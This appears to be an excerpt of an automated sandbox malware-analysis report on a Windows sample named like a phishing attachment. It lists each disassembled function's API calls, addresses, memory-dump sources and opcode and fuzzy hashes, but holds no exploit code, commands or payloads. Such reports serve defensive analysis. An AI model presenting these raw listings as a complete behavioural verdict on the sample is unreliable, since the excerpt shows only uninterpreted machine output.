                                          • Opcode ID: 94fb02eb804fb3f20e2886ba077f81c91b47d544eedd209920e03a229334de66
                                          • Instruction ID: ebfdf34b92492e29ae8519266e470127e47b5399ecd3f72b1a19c909ce0d9bd5
                                          • Opcode Fuzzy Hash: 94fb02eb804fb3f20e2886ba077f81c91b47d544eedd209920e03a229334de66
                                          • Instruction Fuzzy Hash: 1E112976648307BAFA052631FC0BDE7B7DC9B06774F212066F900B90D3FEA169914A98
                                          Function 00E54189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __swprintf.LIBCMT ref: 00E5419D
                                          • __swprintf.LIBCMT ref: 00E541AA
                                            • Part of subcall function 00E138D8: __woutput_l.LIBCMT ref: 00E13931
                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00E541D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E541E0
                                          • LockResource.KERNEL32(00000000), ref: 00E541ED
                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00E5420D
                                          • LoadResource.KERNEL32(?,00000000), ref: 00E5421F
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00E5422E
                                          • LockResource.KERNEL32(?), ref: 00E5423A
                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E5429B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                          • String ID:
                                          • API String ID: 1433390588-0
                                          • Opcode ID: ac88d31104e912d228e04ec2a703f2c03c1565c0704e95b40a8a679e6907755a
                                          • Instruction ID: 4bfddd67a96d0b11564dd53bf42b9fb413db0a254121e626bbfc0aed5200be77
                                          • Opcode Fuzzy Hash: ac88d31104e912d228e04ec2a703f2c03c1565c0704e95b40a8a679e6907755a
                                          • Instruction Fuzzy Hash: 293191B550521AAFCB11DF61DD44EBB7BA8EF04306F004925FD05F21A1DB30DA95CBA0
                                          Function 00E516DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E51700
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E51714
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00E5171B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E5172A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5173C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E51755
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E50778,?,00000001), ref: 00E51767
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517AC
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517C1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E50778,?,00000001), ref: 00E517CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 17190d6758bb53c248909d7df2e77f9ceedf147956a63cfd24f7dd31ab59c932
                                          • Instruction ID: 81d2c909c1e53bac92e8c693dffdc7f780a373c26ae51211e49b5930a8a9b7f2
                                          • Opcode Fuzzy Hash: 17190d6758bb53c248909d7df2e77f9ceedf147956a63cfd24f7dd31ab59c932
                                          • Instruction Fuzzy Hash: 5D31D171604204BFDB11DF5ADC84F7A37E9EB4A71AF104496FD04F62A0D7749D888B54
                                          Function 00E69428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-218231672
                                          • Opcode ID: 3770c82e82f8d666bad64e1c9330c792eb6588c509d613c40e3a7312fc14c5ce
                                          • Instruction ID: e093dff0d5ff10df47372bd0e997eec4c6a466e12a12f95ac7af41b055157d10
                                          • Opcode Fuzzy Hash: 3770c82e82f8d666bad64e1c9330c792eb6588c509d613c40e3a7312fc14c5ce
                                          • Instruction Fuzzy Hash: 2A91CC70A40309ABCF24DFA5E848FAEBBB8EF85354F109019F519BB281D7709945CFA0
                                          Function 00E4A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumChildWindows.USER32(?,00E4AA64), ref: 00E4A9A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: d8adee4a2328fbac88ce3e54f6e5a1509a451d3cee5775974f9740e54f05c76d
                                          • Instruction ID: 643841173d90d385a55cce06f3297face542a41414df7dd8cdc96d8a931fa148
                                          • Opcode Fuzzy Hash: d8adee4a2328fbac88ce3e54f6e5a1509a451d3cee5775974f9740e54f05c76d
                                          • Instruction Fuzzy Hash: 8191E970940206EBDB18DF60E481BE9F7B4FF44314F59A129E989B7181DF307999CBA1
                                          Function 00DF2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00DF2EAE
                                            • Part of subcall function 00DF1DB3: GetClientRect.USER32(?,?), ref: 00DF1DDC
                                            • Part of subcall function 00DF1DB3: GetWindowRect.USER32(?,?), ref: 00DF1E1D
                                            • Part of subcall function 00DF1DB3: ScreenToClient.USER32(?,?), ref: 00DF1E45
                                          • GetDC.USER32 ref: 00E2CF82
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E2CF95
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E2CFA3
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E2CFB8
                                          • ReleaseDC.USER32(?,00000000), ref: 00E2CFC0
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E2D04B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 6cce727b6d6b0dffd28dbae8b335f6a547a2efd47ba52956dc17fb304d0d5244
                                          • Instruction ID: 1cfe1f4a451527800695ccdd9850f8b30afc2095372f4ee864cdfd1e402b173e
                                          • Opcode Fuzzy Hash: 6cce727b6d6b0dffd28dbae8b335f6a547a2efd47ba52956dc17fb304d0d5244
                                          • Instruction Fuzzy Hash: DB71D331504209DFCF21CF64DC84ABA7BB6FF48314F28926AFE55AA1A5C7318C85DB60
                                          Function 00E68F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E7F910), ref: 00E6903D
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E7F910), ref: 00E69071
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E691EB
                                          • SysFreeString.OLEAUT32(?), ref: 00E69215
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: ac5714ed2c6ac0c6170080bbeed8b7ecd91c166f99daeb1d25158222bf9a2f23
                                          • Instruction ID: 9fcfcabfad53d6bba69537dbd41d5017a8484ae05e988a57add1e77d35b15a8b
                                          • Opcode Fuzzy Hash: ac5714ed2c6ac0c6170080bbeed8b7ecd91c166f99daeb1d25158222bf9a2f23
                                          • Instruction Fuzzy Hash: D0F13971A40209EFDF04DF94D888EAEB7B9FF49354F108059F915AB291DB31AE45CB60
                                          Function 00E6F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E6F9C9
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FB5C
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FB80
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FBC0
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E6FBE2
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E6FD5E
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E6FD90
                                          • CloseHandle.KERNEL32(?), ref: 00E6FDBF
                                          • CloseHandle.KERNEL32(?), ref: 00E6FE36
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: faa143088d41399c49255c7406d00c82cbbea3bb182e94f1f07bf60af0d725be
                                          • Instruction ID: 96765d7943b9a8f47a136f2f56827b6587af4a4c209df360a4abbdc3c0cfbdf1
                                          • Opcode Fuzzy Hash: faa143088d41399c49255c7406d00c82cbbea3bb182e94f1f07bf60af0d725be
                                          • Instruction Fuzzy Hash: F5E1E631644301DFC714EF24E491B6ABBE1EF84354F14986DF999AB2A2CB31EC45CB52
                                          Function 00E54F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E538D3,?), ref: 00E548C7
                                            • Part of subcall function 00E548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E538D3,?), ref: 00E548E0
                                            • Part of subcall function 00E54CD3: GetFileAttributesW.KERNEL32(?,00E53947), ref: 00E54CD4
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00E54FE2
                                          • _wcscmp.LIBCMT ref: 00E54FFC
                                          • MoveFileW.KERNEL32(?,?), ref: 00E55017
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: 4f9fe8b58c5c83e553e61cbdb667b7333762885ef9b5522bf23e3d5480b83b63
                                          • Instruction ID: 33b0da416cb8ffc5b70c2b13b32ee5976908729b0b40ee6627f23060fd8266ce
                                          • Opcode Fuzzy Hash: 4f9fe8b58c5c83e553e61cbdb667b7333762885ef9b5522bf23e3d5480b83b63
                                          • Instruction Fuzzy Hash: 725174B21087849BC724DB60DC819DFB3ECAF84305F005D2EF689E3191EE74A28C8766
                                          Function 00E788B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E7896E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 3b2f0d7b6024c427df0262aa1b86d8f8a6d2aa98dc550b0d5ee319a613cacf26
                                          • Instruction ID: b8387202df98666a61181846fa005a2bc997c2c4e636ca0b656cf54cd61aa9b2
                                          • Opcode Fuzzy Hash: 3b2f0d7b6024c427df0262aa1b86d8f8a6d2aa98dc550b0d5ee319a613cacf26
                                          • Instruction Fuzzy Hash: D851A430580208BFEF24DF29CD8DBA93B65FB24354F509122F61DF61A1DF71A98097A2
                                          Function 00DF2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E2C547
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E2C569
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E2C581
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E2C59F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E2C5C0
                                          • DestroyIcon.USER32(00000000), ref: 00E2C5CF
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E2C5EC
                                          • DestroyIcon.USER32(?), ref: 00E2C5FB
                                            • Part of subcall function 00E7A71E: DeleteObject.GDI32(00000000), ref: 00E7A757
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: 857de070d30590ec3a8d1986214ee8c311596191ac2e1c2f3213d611012f7b57
                                          • Instruction ID: 0f5e6a50e9cd090ad92c28a94750c92d97d523ab0cb07e33830bbe4703da6c26
                                          • Opcode Fuzzy Hash: 857de070d30590ec3a8d1986214ee8c311596191ac2e1c2f3213d611012f7b57
                                          • Instruction Fuzzy Hash: 7E516870A40209AFDB24DF25DC45BBA37B5EB58714F218528FA46A72A0DB70ED90DB60
                                          Function 00E48E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E0C
                                          • HeapAlloc.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E13
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E48A84,00000B00,?,?), ref: 00E48E28
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E30
                                          • DuplicateHandle.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E33
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E48A84,00000B00,?,?), ref: 00E48E43
                                          • GetCurrentProcess.KERNEL32(00E48A84,00000000,?,00E48A84,00000B00,?,?), ref: 00E48E4B
                                          • DuplicateHandle.KERNEL32(00000000,?,00E48A84,00000B00,?,?), ref: 00E48E4E
                                          • CreateThread.KERNEL32(00000000,00000000,00E48E74,00000000,00000000,00000000), ref: 00E48E68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 956c95e4ff57529862a4383c6cbedf1ccac1fe77d72431185bcab088a3f40106
                                          • Instruction ID: 95078be10721af3afa447870d8b33518b8c6d26d688044fd11ab4d16c1ce9e26
                                          • Opcode Fuzzy Hash: 956c95e4ff57529862a4383c6cbedf1ccac1fe77d72431185bcab088a3f40106
                                          • Instruction Fuzzy Hash: 4A01AC75641344FFE610EB65DC49F5B3B6CEB89711F404421FA09EB1A2CA70D8448A20
                                          Function 00E69A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E47652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                            • Part of subcall function 00E47652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
                                            • Part of subcall function 00E47652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                            • Part of subcall function 00E47652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E69B1B
                                          • _memset.LIBCMT ref: 00E69B28
                                          • _memset.LIBCMT ref: 00E69C6B
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E69C97
                                          • CoTaskMemFree.OLE32(?), ref: 00E69CA2
                                          Strings
                                          • NULL Pointer assignment, xrefs: 00E69CF0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: cac042abbc453dee980c37b82198c80d73835aa46fea3a5c602ea408c72502e8
                                          • Instruction ID: 158eaf96d9b84ca39244f9b947160c214a41e127089a83a9d367588007e7bec4
                                          • Opcode Fuzzy Hash: cac042abbc453dee980c37b82198c80d73835aa46fea3a5c602ea408c72502e8
                                          • Instruction Fuzzy Hash: AA912971D00219ABDF10DFA5EC85AEEBBB9EF08750F208169F519B7241DB716A44CFA0
                                          Function 00E76FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E77093
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E770A7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E770C1
                                          • _wcscat.LIBCMT ref: 00E7711C
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E77133
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E77161
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 90aab2dcd606867b5f1f1bfed4d0de565e6989aaf771610a2e48c6eacc51b8d8
                                          • Instruction ID: 0379217f8f8396f4ad8b88616dac42e26f6c4287778f96a4ac21018c175f964f
                                          • Opcode Fuzzy Hash: 90aab2dcd606867b5f1f1bfed4d0de565e6989aaf771610a2e48c6eacc51b8d8
                                          • Instruction Fuzzy Hash: 8C419171A04308AFDB21DFA4CC85BEE77E8EF08754F10556AF588B7192D6719D848B60
                                          Function 00E6EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E53E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E53EB6
                                            • Part of subcall function 00E53E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E53EC4
                                            • Part of subcall function 00E53E91: CloseHandle.KERNEL32(00000000), ref: 00E53F8E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6ECB8
                                          • GetLastError.KERNEL32 ref: 00E6ECCB
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6ECFA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E6ED77
